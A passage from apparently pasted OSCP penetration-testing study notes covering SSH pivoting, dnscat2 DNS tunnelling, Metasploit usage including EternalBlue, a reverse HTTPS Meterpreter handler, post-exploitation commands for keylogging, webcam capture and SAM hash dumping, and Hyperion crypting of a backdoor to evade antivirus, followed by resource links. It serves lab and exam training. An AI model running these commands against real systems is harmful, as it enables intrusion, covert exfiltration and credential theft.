  2300.  
  2301. -   SSH Pivoting
  2302.  
  2303.     -   SSH pivoting from one network to another:  
  2304.    
  2305.         `ssh -D <local host>:1010 -p 22 user@<remote host>`
  2306.  
  2307. -   DNS Tunneling
  2308.  
  2309.     -   dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.
  2310.  
  2311.     -   Attacking Machine Installation:  
  2312.    
  2313.         `apt-get update  
  2314.         apt-get -y install ruby-dev git make g++  
  2315.         gem install bundler  
  2316.         git clone https://github.com/iagox86/dnscat2.git  
  2317.         cd dnscat2/server  
  2318.         bundle install`
  2319.  
  2320.     -   Run dnscat2:  
  2321.    
  2322.         `ruby ./dnscat2.rb  
  2323.         dnscat2> New session established: 1422  
  2324.         dnscat2> session -i 1422`
  2325.  
  2326.     -   Target Machine:  
  2327.         https://downloads.skullsecurity.org/dnscat2/
  2328.         https://github.com/lukebaggett/dnscat2-powershell/  
  2329.        
  2330.         `dnscat --host <dnscat server ip>`
  2331.  
  2332. <span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework
  2333. ======================================================================================================================
  2334.  
  2335. -   See [*Metasploit Unleashed
  2336.     Course*](https://www.offensive-security.com/metasploit-unleashed/)
  2337.     in the Essentials
  2338.  
  2339. -   Search for exploits using Metasploit GitHub framework source code:  
  2340.     [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)  
  2341.     Translate them for use on OSCP LAB or EXAM.
  2342.  
  2343. -   Metasploit
  2344.  
  2345.     -   MetaSploit requires Postfresql  
  2346.    
  2347.         `systemctl start postgresql`
  2348.  
  2349.     -   To enable Postgresql on startup  
  2350.    
  2351.         `systemctl enable postgresql`
  2352.  
  2353. -   MSF Syntax
  2354.  
  2355.     -   Start metasploit  
  2356.        
  2357.         `msfconsole  `
  2358.        
  2359.         `msfconsole -q`
  2360.  
  2361.     -   Show help for command  
  2362.    
  2363.         `show -h`
  2364.  
  2365.     -   Show Auxiliary modules  
  2366.    
  2367.         `show auxiliary`
  2368.  
  2369.     -   Use a module  
  2370.    
  2371.         `use auxiliary/scanner/snmp/snmp_enum  
  2372.         use auxiliary/scanner/http/webdav_scanner  
  2373.         use auxiliary/scanner/smb/smb_version  
  2374.         use auxiliary/scanner/ftp/ftp_login  
  2375.         use exploit/windows/pop3/seattlelab_pass`
  2376.  
  2377.     -   Show the basic information for a module  
  2378.    
  2379.         `info`
  2380.  
  2381.     -   Show the configuration parameters for a module  
  2382.    
  2383.         `show options`
  2384.  
  2385.     -   Set options for a module  
  2386.    
  2387.         `set RHOSTS 192.168.1.1-254  
  2388.         set THREADS 10`
  2389.  
  2390.     -   Run the module  
  2391.    
  2392.         `run`
  2393.  
  2394.     -   Execute an Exploit
  2395.    
  2396.         `exploit`
  2397.  
  2398.     -   Search for a module  
  2399.    
  2400.        `search type:auxiliary login`
  2401.  
  2402. -   Metasploit Database Access
  2403.  
  2404.     -   Show all hosts discovered in the MSF database  
  2405.    
  2406.         `hosts`
  2407.  
  2408.     -   Scan for hosts and store them in the MSF database  
  2409.    
  2410.         `db_nmap`
  2411.  
  2412.     -   Search machines for specific ports in MSF database
  2413.    
  2414.         `services -p 443`
  2415.  
  2416.     -   Leverage MSF database to scan SMB ports (auto-completed rhosts)  
  2417.        
  2418.         `services -p 443 --rhosts`
  2419.  
  2420. -   Staged and Non-staged
  2421.  
  2422.     -   Non-staged payload - is a payload that is sent in its entirety in one go
  2423.  
  2424.     -   Staged - sent in two parts  Not have enough buffer space  Or need to bypass antivirus
  2425.  
  2426.  -   MS 17-010 - EternalBlue
  2427.  
  2428.     -   You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue).  Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box.  I have never had much luck using the built in Metasploit EternalBlue module.  I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:
  2429.     https://www.youtube.com/watch?v=4OHLor9VaRI
  2430.    
  2431.      
  2432.       1. First step is to configure the Kali to work with wine 32bit
  2433.      
  2434.       `dpkg --add-architecture i386 && apt-get update && apt-get install wine32
  2435.       rm -r ~/.wine
  2436.       wine cmd.exe
  2437.       exit`
  2438.            
  2439.       2. Download the exploit repostory
  2440.       https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
  2441.      
  2442.       3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
  2443.  
  2444.       4. Start metasploit console
  2445.      
  2446.  
  2447. I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
  2448.  
  2449.      
  2450.       `use exploit/windows/smb/eternalblue_doublepulsar
  2451.       msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
  2452.       RHOST => 10.11.1.73
  2453.       msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
  2454.       PROCESSINJECT => spoolsv.exe
  2455.       msf exploit(eternalblue_doublepulsar) > run`
  2456.      
  2457.  
  2458.  
  2459. -   Experimenting with Meterpreter
  2460.  
  2461.     -   Get system information from Meterpreter Shell  
  2462.    
  2463.         `sysinfo`
  2464.  
  2465.     -   Get user id from Meterpreter Shell  
  2466.    
  2467.         `getuid`
  2468.  
  2469.     -   Search for a file  
  2470.    
  2471.         `search -f *pass*.txt`
  2472.  
  2473.     -   Upload a file  
  2474.    
  2475.         `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
  2476.  
  2477.     -   Download a file  
  2478.    
  2479.         `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
  2480.  
  2481.     -   Invoke a command shell from Meterpreter Shell  
  2482.    
  2483.         `shell`
  2484.  
  2485.     -   Exit the meterpreter shell  
  2486.    
  2487.         `exit`
  2488.  
  2489. -   Metasploit Exploit Multi Handler
  2490.  
  2491.     -   multi/handler to accept an incoming reverse\_https\_meterpreter
  2492.    
  2493.         `payload  
  2494.         use exploit/multi/handler  
  2495.         set PAYLOAD windows/meterpreter/reverse_https  
  2496.         set LHOST $ip  
  2497.         set LPORT 443  
  2498.         exploit  
  2499.         [*] Started HTTPS reverse handler on https://$ip:443/`
  2500.  
  2501. -   Building Your Own MSF Module
  2502.  
  2503.     -   `mkdir -p ~/.msf4/modules/exploits/linux/misc  
  2504.         cd ~/.msf4/modules/exploits/linux/misc  
  2505.         cp
  2506.         /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
  2507.         ./crossfire.rb  
  2508.         nano crossfire.rb`
  2509.  
  2510. -   Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
  2511.  
  2512.     -   `download` Download a file or directory  
  2513.         `upload` Upload a file or directory  
  2514.         `portfwd` Forward a local port to a remote service  
  2515.         `route` View and modify the routing table  
  2516.         `keyscan_start` Start capturing keystrokes  
  2517.         `keyscan_stop` Stop capturing keystrokes  
  2518.         `screenshot` Grab a screenshot of the interactive desktop  
  2519.         `record_mic` Record audio from the default microphone for X seconds  
  2520.         `webcam_snap` Take a snapshot from the specified webcam  
  2521.         `getsystem` Attempt to elevate your privilege to that of local system.  
  2522.         `hashdump` Dumps the contents of the SAM database
  2523.  
  2524. -   Meterpreter Post Exploitation Features
  2525.  
  2526.     -   Create a Meterpreter background session  
  2527.    
  2528.         `background`
  2529.  
  2530. <span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software
  2531. ===========================================================================================================================
  2532.  
  2533. -   Crypting Known Malware with Software Protectors
  2534.  
  2535.     -   One such open source crypter, called Hyperion  
  2536.    
  2537.         `cp /usr/share/windows-binaries/Hyperion-1.0.zip  
  2538.         unzip Hyperion-1.0.zip  
  2539.         cd Hyperion-1.0/  
  2540.         i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe  
  2541.         cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .  
  2542.         cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .  
  2543.         wine hyperion.exe ../backdoor.exe ../crypted.exe`
  2544.  
  2545.  
  2546. OSCP Course Review
  2547. ================================================================================================================
  2548.  
  2549. -   Offensive Security’s PWB and OSCP — My Experience  
  2550.     [*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)
  2551.  
  2552. -   OSCP Journey  
  2553.     [*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)
  2554.  
  2555. -   Down with OSCP  
  2556.     [*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)
  2557.  
  2558. -   Jolly Frogs - Tech Exams (Very thorough)
  2559.  
  2560. [*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*](http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)
  2561.  
  2562. <span id="_pxmpirqr11x0" class="anchor"><span id="_Toc480741798" class="anchor"></span></span>OSCP Inspired VMs and Walkthroughs
  2563. ================================================================================================================================
  2564.  
  2565. -   [*https://www.vulnhub.com/*](https://www.vulnhub.com/)  
  2566.     [*https://www.root-me.org/*](https://www.root-me.org/)
  2567.  
  2568. -   Walk through of Tr0ll-1 - Inspired by on the Trolling found in the
  2569.     OSCP exam  
  2570.     [*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)  
  2571.     Another walk through for Tr0ll-1  
  2572.     [*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*](https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/)  
  2573.     Taming the troll - walkthrough  
  2574.     [*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)  
  2575.     Troll download on Vuln Hub  
  2576.     [*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)
  2577.  
  2578. -   Sickos - Walkthrough:  
  2579.     [*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)  
  2580.     Sickos - Inspired by Labs in OSCP  
  2581.     [*https://www.vulnhub.com/series/*](https://www.vulnhub.com/series/sickos,70/)[sickos](https://www.vulnhub.com/series/sickos,70/)[*,70/*](https://www.vulnhub.com/series/sickos,70/)
  2582.  
  2583. -   Lord of the Root Walk Through  
  2584.     [*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)  
  2585.     Lord Of The Root: 1.0.1 - Inspired by OSCP  
  2586.     [*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)
  2587.  
  2588. -   Tr0ll-2 Walk Through  
  2589.     [*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*](https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)  
  2590.     Tr0ll-2  
  2591.     [*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)
  2592.  
  2593. <span id="_kfwx4om2dsj4" class="anchor"><span id="_Toc480741799" class="anchor"></span></span>Cheat Sheets
  2594. ==========================================================================================================
  2595.  
  2596. -   Penetration Tools Cheat Sheet  
  2597.     [*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)
  2598.  
  2599. -   Pen Testing Bookmarks  
  2600.     [*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md)
  2601.  
  2602. -   OSCP Cheatsheets  
  2603.     [*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)
  2604.  
  2605. -   CEH Cheatsheet  
  2606.     [*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*](https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)
  2607.  
  2608. -   Net Bios Scan Cheat Sheet  
  2609.     [*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)
  2610.  
  2611. -   Reverse Shell Cheat Sheet  
  2612.     [*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
  2613.  
  2614. -   NMap Cheat Sheet  
  2615.     [*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)
  2616.  
  2617. -   Linux Commands Cheat Sheet  
  2618.     [*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)
  2619.  
  2620. -   Security Hardening CentO 7  
  2621.     [*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)
  2622.  
  2623. -   MetaSploit Cheatsheet  
  2624.     [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
  2625.  
  2626. -   Google Hacking Database:  
  2627.     [*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)
  2628.  
  2629. -   Windows Assembly Language Mega Primer  
  2630.     [*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)
  2631.  
  2632. -   Linux Assembly Language Mega Primer  
  2633.     [*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)
  2634.  
  2635. -   Metasploit Cheat Sheet  
  2636.     [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
  2637.  
  2638. -   A bit dated but most is still relevant
  2639.  
  2640. [*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html)
  2641.  
  2642. -   NetCat
  2643.  
  2644. -   [*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf)
  2645.  
  2646. -   [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)
  2647.  
  2648. -   [*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)
  2649.  
  2650. -   [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)
  2651.  
  2652. -   [*http://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
  2653.  
  2654. -   [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)
  2655.  
  2656. -   [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)
  2657.  
  2658. Essentials
  2659. ========================================================================================================
  2660.  
  2661. -   Exploit-db  
  2662.     [*https://www.exploit-db.com/*](https://www.exploit-db.com/)
  2663.  
  2664. -   SecurityFocus - Vulnerability database  
  2665.     [*http://www.securityfocus.com/*](http://www.securityfocus.com/)
  2666.  
  2667. -   Vuln Hub - Vulnerable by design  
  2668.     [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
  2669.  
  2670. -   Exploit Exercises  
  2671.     [*https://exploit-exercises.com/*](https://exploit-exercises.com/)
  2672.  
  2673. -   SecLists - collection of multiple types of lists used during
  2674.     security assessments. List types include usernames, passwords, URLs,
  2675.     sensitive data grep strings, fuzzing payloads  
  2676.     [*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)
  2677.  
  2678. -   Security Tube  
  2679.     [*http://www.securitytube.net/*](http://www.securitytube.net/)
  2680.  
  2681. -   Metasploit Unleashed - free course on how to use Metasploit  
  2682.     [*https://www.offensive-security.com/metasploit-unleashed*](https://www.offensive-security.com/metasploit-unleashed/)*/*
  2683.  
  2684. -   0Day Security Enumeration Guide
  2685.     [*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-testing/enumeration.html)
  2686.  
  2687. -   Github IO Book - Pen Testing Methodology  
  2688.     [*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)
  2689.    
  2690. Windows Privledge Escalation
  2691. ========================================================================================================
  2692.  
  2693. -   Fuzzy Security
  2694.     [*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)
  2695.    
  2696. -   accesschk.exe
  2697.     https://technet.microsoft.com/en-us/sysinternals/bb664922
  2698.  
  2699. -   Windows Priv Escalation For Pen Testers
  2700.     https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  2701.  
  2702. -   Elevating Privileges to Admin and Further
  2703.     https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
  2704.    
  2705. -   Transfer files to windows machines
  2706.     https://blog.netspi.com/15-ways-to-download-a-file/
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top